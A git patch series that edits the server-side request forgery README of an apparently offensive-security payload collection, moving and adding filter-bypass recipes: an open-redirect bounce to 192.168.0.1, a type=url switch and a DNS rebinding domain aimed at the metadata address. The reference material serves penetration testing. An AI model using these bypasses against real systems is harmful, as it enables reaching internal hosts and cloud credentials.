From 6d37ad9e2e8c9b7d84ffcbacb31ae88b59f70432 Mon Sep 17 00:00:00 2001 From: Alex Lauerman Date: Sun, 21 Jun 2020 16:19:15 -0500 Subject: [PATCH 1/3] Improved Clarity of ssrf redirect --- Server Side Request Forgery/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 19ba16e..161e267 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -79,11 +79,11 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit [using a redirection](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) +Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) ```powershell -1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com -2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP +1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) +2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 ``` From c39c904c9a6ff204f326072fb406eb0220563c66 Mon Sep 17 00:00:00 2001 From: Alex Lauerman Date: Sun, 21 Jun 2020 16:27:32 -0500 Subject: [PATCH 2/3] Moved bypasses under the bypasses section --- Server Side Request Forgery/README.md | 32 +++++++++++++-------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 161e267..d130656 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -79,22 +79,6 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) - -```powershell -1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) -2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP -vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 -``` - -Advanced exploit using type=url - -```powershell -Change "type=file" to "type=url" -Paste URL in text field and hit enter -Using this vulnerability users can upload images from any image URL = trigger an SSRF -``` - ## Bypassing filters ### Bypass using HTTPS @@ -237,6 +221,22 @@ http://127.1.1.1:80#\@127.2.2.2:80/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) +### Bypassing using other tricks +[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) + +```powershell +1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) +2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP +vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 +``` + +Using type=url + +```powershell +Change "type=file" to "type=url" +Paste URL in text field and hit enter +Using this vulnerability users can upload images from any image URL = trigger an SSRF +``` ## SSRF exploitation via URL Scheme From d5c1f39c0f61702bca90297929e26bc9b90318d8 Mon Sep 17 00:00:00 2001 From: Alex Lauerman Date: Sun, 21 Jun 2020 16:31:16 -0500 Subject: [PATCH 3/3] Added DNS Rebinding --- Server Side Request Forgery/README.md | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index d130656..0b889ec 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -221,7 +221,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) -### Bypassing using other tricks +### Bypassing using a redirect [using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) ```powershell @@ -230,7 +230,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/ vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 ``` -Using type=url +### Bypassing using type=url ```powershell Change "type=file" to "type=url" @@ -238,6 +238,14 @@ Paste URL in text field and hit enter Using this vulnerability users can upload images from any image URL = trigger an SSRF ``` +### Bypassing using DNS Rebinding (TOCTOU) + +```powershell +Create a domain that change between two IPs. http://1u.ms/ exists for this purpose. +For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain: +make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms +``` + ## SSRF exploitation via URL Scheme ### File